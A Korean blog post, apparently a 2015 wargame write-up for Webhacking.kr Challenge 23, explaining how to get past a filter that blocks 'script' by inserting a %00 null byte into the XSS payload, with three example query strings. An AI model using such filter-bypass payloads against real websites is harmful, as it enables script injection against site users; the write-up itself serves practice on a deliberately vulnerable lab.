티스토리 뷰

Wargame/Webhacking.kr

Challenge 23

do9dark 2015. 8. 2. 12:06

<script>alert(1);</script>를 입력하는 문제이다.


해당 값을 입력을 해보면 no hack이 발생하여 입력할 수가 없다.


no hack이 발생하는 조건을 살펴보면 시작 부분에 script라는 문자가 입력될 경우 발생된다는 것을 알아낼 수 있다.

이를 우회하기 위해서 script 문자 사이에 %00(null) 문자를 입력하면 우회할 수 있다.


?code=<s%00cript>alert(1);</script>




+추가

?code=%00<script>alert(1);</script>

?code=<%00script>alert(1);</script>

위와 같은 방법으로도 우회가 가능하다.



'Wargame > Webhacking.kr' 카테고리의 다른 글

Challenge 28  (0) 2015.08.07
Challenge 27  (0) 2015.08.07
Challenge 26  (0) 2015.08.07
Challenge 25  (0) 2015.08.07
Challenge 24  (0) 2015.08.02
Challenge 22  (0) 2015.07.12
Challenge 21  (0) 2015.07.12
Challenge 20  (0) 2015.07.09
Challenge 19  (0) 2015.07.08
Challenge 18  (0) 2015.07.07
댓글
«   2024/03   »
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
31
링크
공지사항
Total
Today
Yesterday